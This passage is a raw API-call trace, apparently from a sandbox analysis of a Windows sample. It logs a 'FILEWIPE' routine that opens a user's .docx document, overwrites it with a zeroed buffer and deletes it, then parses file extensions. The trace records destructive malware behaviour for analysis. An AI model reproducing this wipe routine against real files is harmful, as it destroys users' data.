wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.559] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.560] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.560] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0180.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.564] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6343b140, ftCreationTime.dwHighDateTime=0x1d5966d, ftLastAccessTime.dwLowDateTime=0x1a09100, ftLastAccessTime.dwHighDateTime=0x1d59993, ftLastWriteTime.dwLowDateTime=0x1a09100, ftLastWriteTime.dwHighDateTime=0x1d59993, nFileSizeHigh=0x0, nFileSizeLow=0x143af, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ZZwMa.docx", cAlternateFileName="ZZWMA~1.DOC")) returned 0x90af58 [0180.564] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0180.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.564] CharLowerBuffW (in: lpsz="byte[82863]", cchLength=0xb | out: lpsz="byte[82863]") returned 0xb [0180.566] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.566] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0180.566] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.566] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0180.566] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0180.566] FreeLibrary (hLibModule=0x75c90000) returned 1 [0180.566] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.566] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.566] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.566] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0180.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.566] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.567] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0180.567] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zzwma.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0180.568] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.568] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.568] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.568] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.568] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0180.568] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.568] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.568] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.569] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.569] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.569] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.569] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.569] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.569] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0180.569] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.569] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.569] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.569] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.569] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.570] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.570] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx", lpFilePart=0x0) returned 0x32 [0180.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.594] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zzwma.docx")) returned 0x20 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fed50 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.596] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6343b140, ftCreationTime.dwHighDateTime=0x1d5966d, ftLastAccessTime.dwLowDateTime=0x1a09100, ftLastAccessTime.dwHighDateTime=0x1d59993, ftLastWriteTime.dwLowDateTime=0x10e68680, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x143af, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ZZwMa.docx", cAlternateFileName="ZZWMA~1.DOC")) returned 0x90af58 [0180.597] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zzwma.docx")) returned 1 [0180.600] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6343b140, ftCreationTime.dwHighDateTime=0x1d5966d, ftLastAccessTime.dwLowDateTime=0x1a09100, ftLastAccessTime.dwHighDateTime=0x1d59993, ftLastWriteTime.dwLowDateTime=0x10e68680, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x143af, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ZZwMa.docx", cAlternateFileName="ZZWMA~1.DOC")) returned 0 [0180.600] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0180.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0180.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0180.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0180.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0180.601] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0180.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0180.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0180.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0180.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0180.603] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0180.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0180.604] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0180.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0180.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.604] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0180.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.606] HeapFree (in: hHeap=0x8a0000, 